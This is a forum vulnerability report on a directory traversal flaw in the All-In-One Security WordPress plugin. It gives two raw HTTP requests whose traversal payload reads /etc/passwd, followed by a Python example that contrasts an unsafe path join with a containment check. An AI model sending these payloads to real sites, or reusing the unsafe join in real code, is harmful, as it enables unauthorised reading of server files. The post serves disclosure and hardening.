WordPress Plugin CVE--0156

Gateman (New Member, joined June 25, 2024)

Vulnerability Type: Directory Traversal

Description: The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.

Steps to reproduce:
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs


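The post's two requests both abuse the same weakness: a file name taken from the `aiowps_system_log_file` form field is joined onto a log directory and opened without checking that the result still lies inside that directory. The following added example (not the AIOS plugin's own code; the log directory and nonce value are placeholders) decodes the two constructed request bodies exactly as a form handler would, shows the unsafe join escaping the directory, and shows a containment check that rejects both payloads while still serving a legitimate log file.

```python
"""Unsafe vs. hardened log-file lookup for the traversal described in the post.
Illustrative only; LOG_DIR is a placeholder, not the plugin's real path."""
import os
from urllib.parse import parse_qs

# Placeholder base directory, four levels deep so the post's four ../ reach "/".
LOG_DIR = "/var/www/html/wp-content"


def requested_log_file(post_body: str) -> str:
    """Pull the log-file name out of a URL-encoded form body.

    parse_qs turns %2F into "/" just as PHP's $_POST decoding does, which is
    why the encoded payload reaches the filesystem as real ../ segments."""
    fields = parse_qs(post_body, keep_blank_values=True)
    return fields.get("aiowps_system_log_file", [""])[0]


def unsafe_resolve(name: str) -> str:
    """Vulnerable pattern: join the user-supplied name and trust the result."""
    return os.path.normpath(os.path.join(LOG_DIR, name))


def safe_resolve(name: str):
    """Hardened lookup: return the path only if it stays inside LOG_DIR.

    realpath (not merely normpath) is used so a symlink cannot hop out of
    the directory, and the base itself is rejected so a bare "../" or ""
    cannot turn the file viewer into a directory lister."""
    base = os.path.realpath(LOG_DIR)
    candidate = os.path.realpath(os.path.join(base, name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed bodies mirroring the two in the post (nonce is a placeholder).
BODY_PASSWD = ("_wpnonce=deadbeef&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd"
               "&aiowps_search_error_files=View+latest+system+logs")
BODY_PARENT = ("_wpnonce=deadbeef&aiowps_system_log_file=..%2F"
               "&aiowps_search_error_files=View+latest+system+logs")
BODY_LEGIT = ("_wpnonce=deadbeef&aiowps_system_log_file=error_log.txt"
              "&aiowps_search_error_files=View+latest+system+logs")

if __name__ == "__main__":
    for body in (BODY_PASSWD, BODY_PARENT, BODY_LEGIT):
        name = requested_log_file(body)
        print(f"{name!r}: unsafe -> {unsafe_resolve(name)}  safe -> {safe_resolve(name)}")
```

The second request in the post (`..%2F` alone) is why the check also refuses the base directory itself rather than only paths outside it.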